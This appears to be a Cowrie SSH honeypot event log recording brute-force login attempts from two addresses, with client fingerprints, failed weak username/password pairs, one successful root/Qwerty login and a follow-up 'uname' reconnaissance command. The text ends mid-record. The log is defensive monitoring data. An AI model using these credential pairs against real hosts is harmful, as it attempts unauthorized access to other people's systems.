{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:24:24.345085Z","src_ip":"212.227.235.229","session":"9924277342dd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"4.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:24:25.897669Z","src_ip":"212.227.125.160","session":"9f9a75051249"}
{"eventid":"cowrie.session.closed","duration":"46.3","message":"Connection lost after 46.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:24:25.898819Z","src_ip":"212.227.125.160","session":"9f9a75051249"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"welcome","message":"login attempt [odoo/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T04:24:30.188215Z","src_ip":"212.227.235.229","session":"9924277342dd"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:24:32.248168Z","src_ip":"212.227.235.229","session":"9924277342dd"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwerty","message":"login attempt [root/Qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:24:35.055630Z","src_ip":"212.227.235.229","session":"695f44d4227e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:24:41.241117Z","src_ip":"212.227.235.229","session":"695f44d4227e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:24:41.241807Z","src_ip":"212.227.235.229","session":"695f44d4227e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:24:42.890772Z","src_ip":"212.227.235.229","session":"695f44d4227e"}
{"eventid":"cowrie.session.closed","duration":"22.1","message":"Connection lost after 22.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:24:42.891879Z","src_ip":"212.227.235.229","session":"695f44d4227e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46204,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b9ecdb5ff8f","protocol":"ssh","message":"New connection: 212.227.125.160:46204 (1.2.3.4:22) [session: 0b9ecdb5ff8f]","sensor":"my-vps","timestamp":"2025-08-31T04:24:44.949634Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:24:45.634954Z","src_ip":"212.227.125.160","session":"0b9ecdb5ff8f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:24:45.635606Z","src_ip":"212.227.125.160","session":"0b9ecdb5ff8f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49412,"dst_ip":"1.2.3.4","dst_port":22,"session":"5abfbe461d68","protocol":"ssh","message":"New connection: 212.227.125.160:49412 (1.2.3.4:22) [session: 5abfbe461d68]","sensor":"my-vps","timestamp":"2025-08-31T04:24:46.796762Z"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"welcome","message":"login attempt [odoo/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T04:24:47.895606Z","src_ip":"212.227.125.160","session":"0b9ecdb5ff8f"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:24:49.401116Z","src_ip":"212.227.125.160","session":"0b9ecdb5ff8f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:24:50.697505Z","src_ip":"212.227.125.160","session":"5abfbe461d68"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:24:50.698252Z","src_ip":"212.227.125.160","session":"5abfbe461d68"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"abc123","message":"login attempt [ftpuser/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:24:58.363327Z","src_ip":"212.227.125.160","session":"5abfbe461d68"}
{"eventid":"cowrie.session.closed","duration":"15.4","message":"Connection lost after 15.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:25:02.161772Z","src_ip":"212.227.125.160","session":"5abfbe461d68"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36210,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e6de30d6b22","protocol":"ssh","message":"New connection: 212.227.235.229:36210 (1.2.3.4:22) [session: 6e6de30d6b22]","sensor":"my-vps","timestamp":"2025-08-31T04:25:03.857954Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:25:05.735335Z","src_ip":"212.227.235.229","session":"6e6de30d6b22"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:25:05.736801Z","src_ip":"212.227.235.229","session":"6e6de30d6b22"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"abc123","message":"login attempt [ftpuser/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:25:12.717837Z","src_ip":"212.227.235.229","session":"6e6de30d6b22"}
{"eventid":"cowrie.session.closed","duration":"12.3","message":"Connection lost after 12.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:25:16.186308Z","src_ip":"212.227.235.229","session":"6e6de30d6b22"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34996,"dst_ip":"1.2.3.4","dst_port":22,"session":"e845fe5d8969","protocol":"ssh","message":"New connection: 212.227.235.229:34996 (1.2.3.4:22) [session: e845fe5d8969]","sensor":"my-vps","timestamp":"2025-08-31T04:25:23.059676Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44630,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c9d46bf7d5c","protocol":"ssh","message":"New connection: 212.227.125.160:44630 (1.2.3.4:22) [session: 9c9d46bf7d5c]","sensor":"my-vps","timestamp":"2025-08-31T04:25:23.558438Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:25:24.237500Z","src_ip":"212.227.235.229","session":"e845fe5d8969"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:25:24.238219Z","src_ip":"212.227.235.229","session":"e845fe5d8969"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:25:27.345383Z","src_ip":"212.227.125.160","session":"9c9d46bf7d5c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:25:27.346198Z","src_ip":"212.227.125.160","session":"9c9d46bf7d5c"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"abc123","message":"login attempt [odoo/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:25:29.857463Z","src_ip":"212.227.235.229","session":"e845fe5d8969"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:25:31.684638Z","src_ip":"212.227.235.229","session":"e845fe5d8969"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34076,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ac7ca304c7a","protocol":"ssh","message":"New connection: 212.227.235.229:34076 (1.2.3.4:22) [session: 0ac7ca304c7a]","sensor":"my-vps","timestamp":"2025-08-31T04:25:41.100383Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53466,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ad14b031f5e","protocol":"ssh","message":"New connection: 212.227.125.160:53466 (1.2.3.4:22) [session: 2ad14b031f5e]","sensor":"my-vps","timestamp":"2025-08-31T04:25:44.676404Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:25:45.188600Z","src_ip":"212.227.125.160","session":"2ad14b031f5e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:25:45.189371Z","src_ip":"212.227.125.160","session":"2ad14b031f5e"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"abc123","message":"login attempt [odoo/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:25:48.057726Z","src_ip":"212.227.125.160","session":"2ad14b031f5e"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:25:49.642526Z","src_ip":"212.227.125.160","session":"2ad14b031f5e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:25:50.921978Z","src_ip":"212.227.235.229","session":"0ac7ca304c7a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:25:50.922725Z","src_ip":"212.227.235.229","session":"0ac7ca304c7a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42486,"dst_ip":"1.2.3.4","dst_port":22,"session":"2236c90fc3d3","protocol":"ssh","message":"New connection: 212.227.235.229:42486 (1.2.3.4:22) [session: 2236c90fc3d3]","sensor":"my-vps","timestamp":"2025-08-31T04:26:22.801354Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:26:23.804765Z","src_ip":"212.227.235.229","session":"2236c90fc3d3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:26:23.805521Z","src_ip":"212.227.235.229","session":"2236c90fc3d3"}
{"eventid":"cowrie.login.failed","username":"test","password":"test","message":"login attempt [test/test] failed","sensor":"my-vps","timestamp":"2025-08-31T04:26:24.887194Z","src_ip":"212.227.125.160","session":"9c9d46bf7d5c"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123456","message":"login attempt [oracle/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:26:29.662397Z","src_ip":"212.227.235.229","session":"2236c90fc3d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49166,"dst_ip":"1.2.3.4","dst_port":22,"session":"0dba06f349ae","protocol":"ssh","message":"New connection: 212.227.125.160:49166 (1.2.3.4:22) [session: 0dba06f349ae]","sensor":"my-vps","timestamp":"2025-08-31T04:26:29.960052Z"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:26:31.556192Z","src_ip":"212.227.235.229","session":"2236c90fc3d3"}
{"eventid":"cowrie.session.closed","duration":"68.4","message":"Connection lost after 68.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:26:31.913353Z","src_ip":"212.227.125.160","session":"9c9d46bf7d5c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:26:35.912203Z","src_ip":"212.227.125.160","session":"0dba06f349ae"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","s